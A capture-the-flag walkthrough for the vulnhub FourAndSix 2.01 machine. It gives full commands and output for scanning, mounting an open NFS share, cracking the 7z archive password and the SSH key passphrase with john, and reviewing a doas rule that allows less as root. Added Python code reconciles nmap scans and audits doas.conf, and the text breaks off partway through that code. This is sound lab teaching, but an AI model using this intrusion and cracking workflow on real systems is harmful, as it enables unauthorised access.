vulnhub - FOURANDSIX
1 Machine details
Machine name: vulnhub - FOURANDSIX: 2.01
Download link: https://download.vulnhub.com/fourandsix/FourAndSix2.ova
1.1 Description
None
1.2 Hint
Become the root user and read /root/flag.txt
2 Target scanning
2.1 Host discovery
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.0.0/24
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 10:11 EDT
Nmap scan report for 192.168.0.1
Host is up (0.00087s latency).
MAC Address: F4:2A:7D:52:0E:DA (Tp-link Technologies)
Nmap scan report for 192.168.0.102
Host is up (0.0010s latency).
MAC Address: 00:0C:29:A4:07:03 (VMware)
Nmap scan report for 192.168.0.107
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 2.22 seconds
From knowledge of my own LAN, the target machine is 192.168.0.102.
2.2 Scanning for open ports
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.0.102
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 10:29 EDT
Warning: 192.168.0.102 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.0.102
Host is up (0.00043s latency).
Not shown: 61921 filtered tcp ports (no-response), 3612 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
MAC Address: 00:0C:29:A4:07:03 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 70.85 seconds
Ports 22 and 111 are open. The rpcbind service on port 111 is the RPC port mapper that NFS depends on, so the initial conclusion is that the scan missed some ports.
Scanning again gives the following result:
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.0.102
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 11:04 EDT
Warning: 192.168.0.102 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.0.102
Host is up (0.00035s latency).
Not shown: 61720 filtered tcp ports (no-response), 3811 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
602/tcp open xmlrpc-beep
2049/tcp open nfs
MAC Address: 00:0C:29:A4:07:03 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 70.72 seconds
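The two full-port scans above returned different port sets because the host filtered most probes and nmap hit its retransmission cap. As an added example, not part of the original writeup, this Python snippet reconciles several nmap runs against the same target and lists the ports that did not show up in every run; the scan text is a constructed copy of the relevant lines above.

```python
import re
from collections import defaultdict

# Constructed input: the relevant lines of the two full-port scans shown above.
SCAN_1 = """\
Warning: 192.168.0.102 giving up on port because retransmission cap hit (10).
Not shown: 61921 filtered tcp ports (no-response), 3612 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
"""

SCAN_2 = """\
Warning: 192.168.0.102 giving up on port because retransmission cap hit (10).
Not shown: 61720 filtered tcp ports (no-response), 3811 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
602/tcp open xmlrpc-beep
2049/tcp open nfs
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)", re.MULTILINE)
FILTERED_RE = re.compile(r"Not shown: (\d+) filtered")
CAP_RE = re.compile(r"retransmission cap hit")


def parse_scan(text):
    """Return ({(port, proto): service}, filtered_count, hit_retransmission_cap)."""
    open_ports = {(int(p), proto): svc
                  for p, proto, state, svc in PORT_RE.findall(text) if state == "open"}
    m = FILTERED_RE.search(text)
    return open_ports, (int(m.group(1)) if m else 0), bool(CAP_RE.search(text))


def reconcile(runs):
    """Merge several runs against one target and flag ports not seen in every run.

    A large 'filtered' count together with the retransmission-cap warning means
    probes were dropped, so no single run is authoritative.
    """
    seen_in = defaultdict(set)
    merged = {}
    warnings = []
    for idx, text in enumerate(runs):
        open_ports, filtered, capped = parse_scan(text)
        if capped:
            warnings.append("run %d hit the retransmission cap (%d ports filtered)"
                            % (idx + 1, filtered))
        for key, svc in open_ports.items():
            seen_in[key].add(idx)
            merged[key] = svc
    inconsistent = sorted(k for k, s in seen_in.items() if len(s) != len(runs))
    return {"ports": merged, "inconsistent": inconsistent, "warnings": warnings}


if __name__ == "__main__":
    report = reconcile([SCAN_1, SCAN_2])
    for (port, proto), svc in sorted(report["ports"].items()):
        note = " (not seen in every run)" if (port, proto) in report["inconsistent"] else ""
        print("%d/%s %s%s" % (port, proto, svc, note))
    for w in report["warnings"]:
        print("warning:", w)
```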
2.3 Detailed TCP scan
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sC -sV -O -p22,111,602,2049 192.168.0.102
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 11:19 EDT
Nmap scan report for 192.168.0.102
Host is up (0.00022s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 ef3b2ecf40199ebb231eaa24a1094ed1 (RSA)
| 256 c85c8b0be1640c75c363d7b380c92fd2 (ECDSA)
|_ 256 61bc459abaa5472060132519b047cbad (ED25519)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3 2049/tcp nfs
| 100003 2,3 2049/udp nfs
| 100005 1,3 602/tcp mountd
|_ 100005 1,3 701/udp mountd
602/tcp open mountd 1-3 (RPC #100005)
2049/tcp open nfs 2-3 (RPC #100003)
MAC Address: 00:0C:29:A4:07:03 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): OpenBSD 6.X|4.X|5.X|3.X (99%)
OS CPE: cpe:/o:openbsd:openbsd:6 cpe:/o:openbsd:openbsd:4.4 cpe:/o:openbsd:openbsd:5 cpe:/o:openbsd:openbsd:3
Aggressive OS guesses: OpenBSD 6.0 - 6.4 (99%), OpenBSD 6.1 (98%), OpenBSD 4.4 - 4.5 (96%), OpenBSD 4.2 - 4.4 (96%), OpenBSD 5.0 - 5.8 (96%), OpenBSD 5.5 (94%), OpenBSD 3.8 - 4.7 (93%), OpenBSD 4.9 - 5.1 (93%), OpenBSD 5.8 (93%), OpenBSD 5.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.70 seconds
2.4 Detailed UDP scan
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -sC -sV -O -p22,111,602,2049 192.168.0.102
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 11:21 EDT
Nmap scan report for 192.168.0.102
Host is up (0.00029s latency).
PORT STATE SERVICE VERSION
22/udp closed ssh
111/udp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3 2049/tcp nfs
| 100003 2,3 2049/udp nfs
| 100005 1,3 602/tcp mountd
|_ 100005 1,3 701/udp mountd
602/udp closed xmlrpc-beep
2049/udp open nfs 2-3 (RPC #100003)
MAC Address: 00:0C:29:A4:07:03 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: OpenBSD 4.X|5.X|6.X
OS CPE: cpe:/o:openbsd:openbsd:4.1 cpe:/o:openbsd:openbsd:5 cpe:/o:openbsd:openbsd:6
OS details: OpenBSD 4.1, OpenBSD 4.2 - 4.4, OpenBSD 4.4 - 4.5, OpenBSD 5.0 - 5.8, OpenBSD 5.8, OpenBSD 6.0 - 6.4, OpenBSD 6.1
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.30 seconds
3 NFS
Port 22 is a lower priority; first let's check whether the target exposes any NFS shares.
┌──(kali㉿kali)-[~]
└─$ showmount -e 192.168.0.102
Export list for 192.168.0.102:
/home/user/storage (everyone) # the target exports a share
┌──(kali㉿kali)-[~]
└─$ mkdir FourandSix # create a folder for this machine to keep things organised
┌──(kali㉿kali)-[~]
└─$ cd FourandSix
┌──(kali㉿kali)-[~/FourandSix]
└─$ mkdir 28
┌──(kali㉿kali)-[~/FourandSix]
└─$ sudo mount -t nfs 192.168.0.102:/home/user/storage 28 # mount the exported directory on the 28 folder
Created symlink /run/systemd/system/remote-fs.target.wants/rpc-statd.service → /lib/systemd/system/rpc-statd.service.
┌──(kali㉿kali)-[~/FourandSix]
└─$ cd 28
┌──(kali㉿kali)-[~/FourandSix/28]
└─$ ls
backup.7z # listing the mount reveals a file
┌──(kali㉿kali)-[~/FourandSix/28]
└─$ cp backup.7z .. # copy the file locally
4 Brute-forcing the 7z archive
4.1 Identifying the file type
┌──(kali㉿kali)-[~/FourandSix]
└─$ file backup.7z
backup.7z: 7-zip archive data, version 0.4
┌──(kali㉿kali)-[~/FourandSix]
└─$ binwalk backup.7z
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 7-zip archive data, version 0.4
4.2 Attempting extraction
# try to extract
┌──(kali㉿kali)-[~/FourandSix]
└─$ 7z x backup.7z
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,32 CPUs AMD Ryzen 5 5600X 6-Core Processor (A20F10),ASM,AES-NI)
Scanning the drive for archives:
1 file, 62111 bytes (61 KiB)
Extracting archive: backup.7z
--
Path = backup.7z
Type = 7z
Physical Size = 62111
Headers Size = 303
Method = LZMA2:16 7zAES
Solid = +
Blocks = 1
Enter password (will not be echoed): # a password is required and we don't have one; enter anything and the error messages reveal the archive contents
ERROR: Data Error in encrypted file. Wrong password? : hello1.jpeg
ERROR: Data Error in encrypted file. Wrong password? : hello2.png
ERROR: Data Error in encrypted file. Wrong password? : hello3.jpeg
ERROR: Data Error in encrypted file. Wrong password? : hello4.png
ERROR: Data Error in encrypted file. Wrong password? : hello5.jpeg
ERROR: Data Error in encrypted file. Wrong password? : hello6.png
ERROR: Data Error in encrypted file. Wrong password? : hello7.jpeg
ERROR: Data Error in encrypted file. Wrong password? : hello8.jpeg
ERROR: Data Error in encrypted file. Wrong password? : id_rsa
ERROR: Data Error in encrypted file. Wrong password? : id_rsa.pub
# the error messages reveal image files and key files
Sub items Errors: 10
Archives with Errors: 1
Sub items Errors: 10
4.3 Cracking the 7z password
# use 7z2john to produce the hash file
┌──(kali㉿kali)-[~/FourandSix]
└─$ 7z2john backup.7z > backup7z_hash
ATTENTION: the hashes might contain sensitive encrypted data. Be careful when sharing or posting these hashes
# crack the hash; the plaintext password chocolate is recovered
┌──(kali㉿kali)-[~/FourandSix]
└─$ john --format=7z --wordlist=/usr/share/wordlists/rockyou.txt backup7z_hash
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip archive encryption [SHA256 128/128 AVX 4x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 0 for all loaded hashes
Cost 3 (compression type) is 2 for all loaded hashes
Cost 4 (data length) is 9488 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
chocolate (backup.7z)
1g 0:00:00:00 DONE (2023-03-13 21:10) 2.272g/s 72.72p/s 72.72c/s 72.72C/s 654321..butterfly
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
# extract again; no problems this time
┌──(kali㉿kali)-[~/FourandSix]
└─$ 7z x backup.7z
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,32 CPUs AMD Ryzen 5 5600X 6-Core Processor (A20F10),ASM,AES-NI)
Scanning the drive for archives:
1 file, 62111 bytes (61 KiB)
Extracting archive: backup.7z
--
Path = backup.7z
Type = 7z
Physical Size = 62111
Headers Size = 303
Method = LZMA2:16 7zAES
Solid = +
Blocks = 1
Enter password (will not be echoed):
Everything is Ok
Files: 10
Size: 64066
Compressed: 62111
# list the files
┌──(kali㉿kali)-[~/FourandSix]
└─$ ls
28 backup7z_hash hello2.png hello4.png hello6.png hello8.jpeg id_rsa.pub
backup.7z hello1.jpeg hello3.jpeg hello5.jpeg hello7.jpeg id_rsa
tips:
┌──(kali㉿kali)-[~/FourandSix]
└─$ 7z2john backup.7z > backup7z_hash
Can't locate Compress/Raw/Lzma.pm in @INC (you may need to install the Compress::Raw::Lzma module) (@INC contains: /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.36.0 /usr/local/share/perl/5.36.0 /usr/lib/x86_64-linux-gnu/perl5/5.36 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl-base /usr/lib/x86_64-linux-gnu/perl/5.36 /usr/share/perl/5.36 /usr/local/lib/site_perl) at /usr/bin/7z2john line 6.
BEGIN failed--compilation aborted at /usr/bin/7z2john line 6.
This error means the Compress::Raw::Lzma module is missing; install it first and then run 7z2john again. On Kali Linux the module can be installed with:
sudo apt-get install libcompress-raw-lzma-perl
This installs the libcompress-raw-lzma-perl package, which contains the Compress::Raw::Lzma module. Once it is installed, 7z2john should work normally.
4.4 Inspecting the images
┌──(kali㉿kali)-[~/FourandSix]
└─$ xdg-open hello1.jpeg # open with Kali's image viewer
Nothing unusual in appearance.
# check the file types
┌──(kali㉿kali)-[~/FourandSix]
└─$ file hello*.*
hello1.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 258x195, components 3
hello2.png: PNG image data, 257 x 196, 8-bit colormap, non-interlaced
hello3.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 227x222, components 3
hello4.png: PNG image data, 206 x 244, 8-bit colormap, non-interlaced
hello5.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 226x223, components 3
hello6.png: PNG image data, 177 x 232, 8-bit colormap, non-interlaced
hello7.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 282x179, components 3
hello8.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 204x248, components 3
# check for embedded or appended data
┌──(kali㉿kali)-[~/FourandSix]
└─$ binwalk hello*.*
Scan Time: 2023-03-13 21:24:05
Target File: /home/kali/FourandSix/hello1.jpeg
MD5 Checksum: 36fd4beda9c0762f4f224150cd67ab07
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
Scan Time: 2023-03-13 21:24:05
Target File: /home/kali/FourandSix/hello2.png
MD5 Checksum: 36e1d982cfec8d61094bb630bf36c828
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 257 x 196, 8-bit colormap, non-interlaced
263 0x107 Zlib compressed data, default compression
Scan Time: 2023-03-13 21:24:05
Target File: /home/kali/FourandSix/hello3.jpeg
MD5 Checksum: 21116e89ae3a6b52ca9a88a4d2b4aa9f
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
Scan Time: 2023-03-13 21:24:05
Target File: /home/kali/FourandSix/hello4.png
MD5 Checksum: 0d8a3ad296f250880dac19e670be01f2
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 206 x 244, 8-bit colormap, non-interlaced
431 0x1AF Zlib compressed data, default compression
Scan Time: 2023-03-13 21:24:05
Target File: /home/kali/FourandSix/hello5.jpeg
MD5 Checksum: 51dabdddaf964782a9871b6d98d3ffec
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
Scan Time: 2023-03-13 21:24:05
Target File: /home/kali/FourandSix/hello6.png
MD5 Checksum: ce9003ed057a2c2c718915aba5d71e17
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 177 x 232, 8-bit colormap, non-interlaced
296 0x128 Zlib compressed data, default compression
Scan Time: 2023-03-13 21:24:05
Target File: /home/kali/FourandSix/hello7.jpeg
MD5 Checksum: e3a266075a99ab85f9e06523dd135c0a
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
Scan Time: 2023-03-13 21:24:05
Target File: /home/kali/FourandSix/hello8.jpeg
MD5 Checksum: 392e26dcb3e0f9a58fa49fcdc61c5e40
Signatures: 411
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
## MD5 values and signatures are shown, but no embedded data was found
# check the files' metadata and comments
┌──(kali㉿kali)-[~/FourandSix]
└─$ exiftool hello*.*
======== hello1.jpeg
ExifTool Version Number : 12.49
File Name : hello1.jpeg
Directory : .
File Size : 9.0 kB
File Modification Date/Time : 2018:10:28 04:45:33-04:00
File Access Date/Time : 2023:03:13 21:14:04-04:00
File Inode Change Date/Time : 2023:03:13 21:11:51-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 258
Image Height : 195
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 258x195
Megapixels : 0.050
======== hello2.png
ExifTool Version Number : 12.49
File Name : hello2.png
Directory : .
File Size : 5.2 kB
File Modification Date/Time : 2018:10:28 04:45:33-04:00
File Access Date/Time : 2023:03:13 21:14:04-04:00
File Inode Change Date/Time : 2023:03:13 21:11:51-04:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 257
Image Height : 196
Bit Depth : 8
Color Type : Palette
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Palette : (Binary data 210 bytes, use -b option to extract)
Image Size : 257x196
Megapixels : 0.050
======== hello3.jpeg
ExifTool Version Number : 12.49
File Name : hello3.jpeg
Directory : .
File Size : 8.9 kB
File Modification Date/Time : 2018:10:28 04:45:33-04:00
File Access Date/Time : 2023:03:13 21:14:04-04:00
File Inode Change Date/Time : 2023:03:13 21:11:51-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 227
Image Height : 222
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 227x222
Megapixels : 0.050
======== hello4.png
ExifTool Version Number : 12.49
File Name : hello4.png
Directory : .
File Size : 8.3 kB
File Modification Date/Time : 2018:10:28 04:45:33-04:00
File Access Date/Time : 2023:03:13 21:14:04-04:00
File Inode Change Date/Time : 2023:03:13 21:11:51-04:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 206
Image Height : 244
Bit Depth : 8
Color Type : Palette
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Palette : (Binary data 378 bytes, use -b option to extract)
Image Size : 206x244
Megapixels : 0.050
======== hello5.jpeg
ExifTool Version Number : 12.49
File Name : hello5.jpeg
Directory : .
File Size : 10 kB
File Modification Date/Time : 2018:10:28 04:45:33-04:00
File Access Date/Time : 2023:03:13 21:14:04-04:00
File Inode Change Date/Time : 2023:03:13 21:11:51-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 226
Image Height : 223
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 226x223
Megapixels : 0.050
======== hello6.png
ExifTool Version Number : 12.49
File Name : hello6.png
Directory : .
File Size : 5.9 kB
File Modification Date/Time : 2018:10:28 04:45:33-04:00
File Access Date/Time : 2023:03:13 21:14:04-04:00
File Inode Change Date/Time : 2023:03:13 21:11:51-04:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 177
Image Height : 232
Bit Depth : 8
Color Type : Palette
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Palette : (Binary data 243 bytes, use -b option to extract)
Image Size : 177x232
Megapixels : 0.041
======== hello7.jpeg
ExifTool Version Number : 12.49
File Name : hello7.jpeg
Directory : .
File Size : 6.2 kB
File Modification Date/Time : 2018:10:28 04:45:33-04:00
File Access Date/Time : 2023:03:13 21:14:16-04:00
File Inode Change Date/Time : 2023:03:13 21:11:51-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 282
Image Height : 179
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 282x179
Megapixels : 0.050
======== hello8.jpeg
ExifTool Version Number : 12.49
File Name : hello8.jpeg
Directory : .
File Size : 8.2 kB
File Modification Date/Time : 2018:10:28 04:45:33-04:00
File Access Date/Time : 2023:03:13 21:14:16-04:00
File Inode Change Date/Time : 2023:03:13 21:11:51-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 204
Image Height : 248
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 204x248
Megapixels : 0.051
8 image files read
5 Brute-forcing the private key passphrase
Besides the images, the archive also gave us id_rsa.pub and id_rsa, which should both be SSH keys.
┌──(kali㉿kali)-[~/FourandSix]
└─$ file id_rsa*
id_rsa: OpenSSH private key
id_rsa.pub: OpenSSH RSA public key
Let's look at their contents.
# public key: reveals the user user@fourandsix2
┌──(kali㉿kali)-[~/FourandSix]
└─$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDClNemaX//nOugJPAWyQ1aDMgfAS8zrJh++hNeMGCo+TIm9UxVUNwc6vhZ8apKZHOX0Ht+MlHLYdkbwSinmCRmOkm2JbMYA5GNBG3fTNWOAbhd7dl2GPG7NUD+zhaDFyRk5gTqmuFumECDAgCxzeE8r9jBwfX73cETemexWKnGqLey0T56VypNrjvueFPmmrWCJyPcXtoLNQDbbdaWwJPhF0gKGrrWTEZo0NnU1lMAnKkiooDxLFhxOIOxRIXWtDtc61cpnnJHtKeO+9wL2q7JeUQB00KLs9/iRwV6b+kslvHaaQ4TR8IaufuJqmICuE4+v7HdsQHslmIbPKX6HANn user@fourandsix2
# private key
┌──(kali㉿kali)-[~/FourandSix]
└─$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
-----END OPENSSH PRIVATE KEY-----
5.1 Trying to log in with the recovered key
┌──(kali㉿kali)-[~/FourandSix]
└─$ sudo ssh -i id_rsa user@192.168.0.102
[sudo] password for kali:
The authenticity of host '192.168.0.102 (192.168.0.102)' can't be established.
ED25519 key fingerprint is SHA256:bYL1jAzqEuvAJUa0fNrhsGN1637L223ZIavvbfsCL0g.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.102' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Even with the private key we are still prompted for a passphrase, so the private key is encrypted too.
5.2 Cracking the private key passphrase
┌──(kali㉿kali)-[~/FourandSix]
└─$ ssh2john id_rsa > id_rsa_hash
# we don't know the hash format, so let john detect it itself
┌──(kali㉿kali)-[~/FourandSix]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
12345678 (id_rsa)
1g 0:00:00:00 DONE (2023-03-13 21:40) 1.136g/s 36.36p/s 36.36c/s 36.36C/s 123456..butterfly
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
# try logging in
┌──(kali㉿kali)-[~/FourandSix]
└─$ sudo ssh -i id_rsa user@192.168.0.102
Enter passphrase for key 'id_rsa':
Last login: Mon Oct 29 13:53:51 2018 from 192.168.1.114
OpenBSD 6.4 (GENERIC) #349: Thu Oct 11 13:25:13 MDT 2018
Welcome to OpenBSD: The proactively secure Unix-like operating system.
Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code. With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.
fourandsix2$ whoami
user
fourandsix2$ pwd
/home/user
fourandsix2$
tips:
john --list=formats | grep ssh # list the ssh-related hash formats (there are many)
6 Privilege escalation
6.1 Surveying the system
fourandsix2$ whoami # current user
user
fourandsix2$ pwd # current directory
/home/user
fourandsix2$ id
uid=1000(user) gid=1000(user) groups=1000(user), 0(wheel)
fourandsix2$ uname
OpenBSD
fourandsix2$ uname -a
OpenBSD fourandsix2.localdomain 6.4 GENERIC#349 amd64
# firewalls and network appliances often run OpenBSD
fourandsix2$ find / -group user -type f 2>/dev/null
# find: -group user matches files owned by group user, -type f restricts to regular files, 2>/dev/null discards error messages
/home/user/.ssh/authorized_keys
/home/user/.Xdefaults
/home/user/.cshrc
/home/user/.cvsrc
/home/user/.login
/home/user/.mailrc
/home/user/.profile
/home/user/storage/backup.7z
/var/mail/user
fourandsix2$ find / -perm -u=s -type f 2>/dev/null
# -perm -u=s matches files with the setuid bit set,
# i.e. files that run with their owner's privileges rather than the caller's
/usr/bin/chfn
/usr/bin/chpass
/usr/bin/chsh
/usr/bin/doas
# /usr/bin/doas is a minimal privilege-delegation tool, similar to sudo, that lets ordinary users run specific commands as a privileged user
/usr/bin/lpr
/usr/bin/lprm
/usr/bin/passwd
/usr/bin/su
/usr/libexec/lockspool
/usr/libexec/ssh-keysign
/usr/sbin/authpf
/usr/sbin/authpf-noip
/usr/sbin/pppd
/usr/sbin/traceroute
/usr/sbin/traceroute6
/sbin/ping
/sbin/ping6
/sbin/shutdown
fourandsix2$ cat /etc/doas.conf # doas configuration file
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
## this rule lets user run /usr/bin/less on /var/log/authlog as root without a password; because of keepenv, the command keeps user's environment variables instead of root's
permit nopass keepenv root as root
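The doas.conf rule above is the root cause of the escalation that follows: the permitted command is a pager that can launch an editor or subshell, and nopass plus keepenv remove the remaining friction. As an added example, not from the original writeup, this Python checker parses doas.conf rules and flags exactly that combination; the program list SHELL_ESCAPE_CMDS is this checker's own assumption, not something doas defines, and setenv blocks are skipped rather than evaluated.

```python
import shlex

# Constructed copy of the /etc/doas.conf displayed on the target above.
DOAS_CONF = """\
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root
"""

# Pagers/editors that can launch an editor or subshell from inside the program;
# a hand-picked list for this checker, not something doas itself defines.
SHELL_ESCAPE_CMDS = {"less", "more", "man", "vi", "vim", "view", "ex", "ed", "nano"}
OPTIONS = {"nopass", "nolog", "persist", "keepenv"}


def parse_rule(line):
    """Parse 'permit|deny [options] identity [as target] [cmd command [args ...]]'.
    Returns None for blank lines and comments; a setenv block without '}' raises ValueError."""
    tokens = shlex.split(line.split("#", 1)[0])
    if not tokens or tokens[0] not in ("permit", "deny"):
        return None
    rule = {"action": tokens[0], "options": set(), "identity": None,
            "target": None, "cmd": None, "args": None}
    i = 1
    while i < len(tokens) and (tokens[i] in OPTIONS or tokens[i] == "setenv"):
        if tokens[i] == "setenv":
            i = tokens.index("}", i) + 1  # skip the { VAR=value ... } block
        else:
            rule["options"].add(tokens[i])
            i += 1
    rule["identity"] = tokens[i]
    i += 1
    if i < len(tokens) and tokens[i] == "as":
        rule["target"], i = tokens[i + 1], i + 2
    if i < len(tokens) and tokens[i] == "cmd":
        rule["cmd"], i = tokens[i + 1], i + 2
    if i < len(tokens) and tokens[i] == "args":
        rule["args"] = tokens[i + 1:]
    return rule


def audit_rule(rule):
    """Findings for one parsed rule; empty list when nothing stands out."""
    findings = []
    if rule["action"] != "permit":
        return findings
    if rule["target"] is not None and rule["identity"] == rule["target"]:
        return findings  # e.g. "root as root": no privilege change
    target = rule["target"] or "any user"  # without "as", doas allows any target user
    if rule["cmd"] is None:
        findings.append("unrestricted: any command as %s" % target)
    else:
        base = rule["cmd"].rsplit("/", 1)[-1]
        if base in SHELL_ESCAPE_CMDS:
            findings.append("%s can launch an editor or subshell, so the cmd/args "
                            "restriction still yields a %s shell for %s"
                            % (base, target, rule["identity"]))
    if "nopass" in rule["options"]:
        findings.append("nopass: no authentication required")
    if "keepenv" in rule["options"]:
        findings.append("keepenv: caller's environment reaches the %s process" % target)
    return findings


def audit(text):
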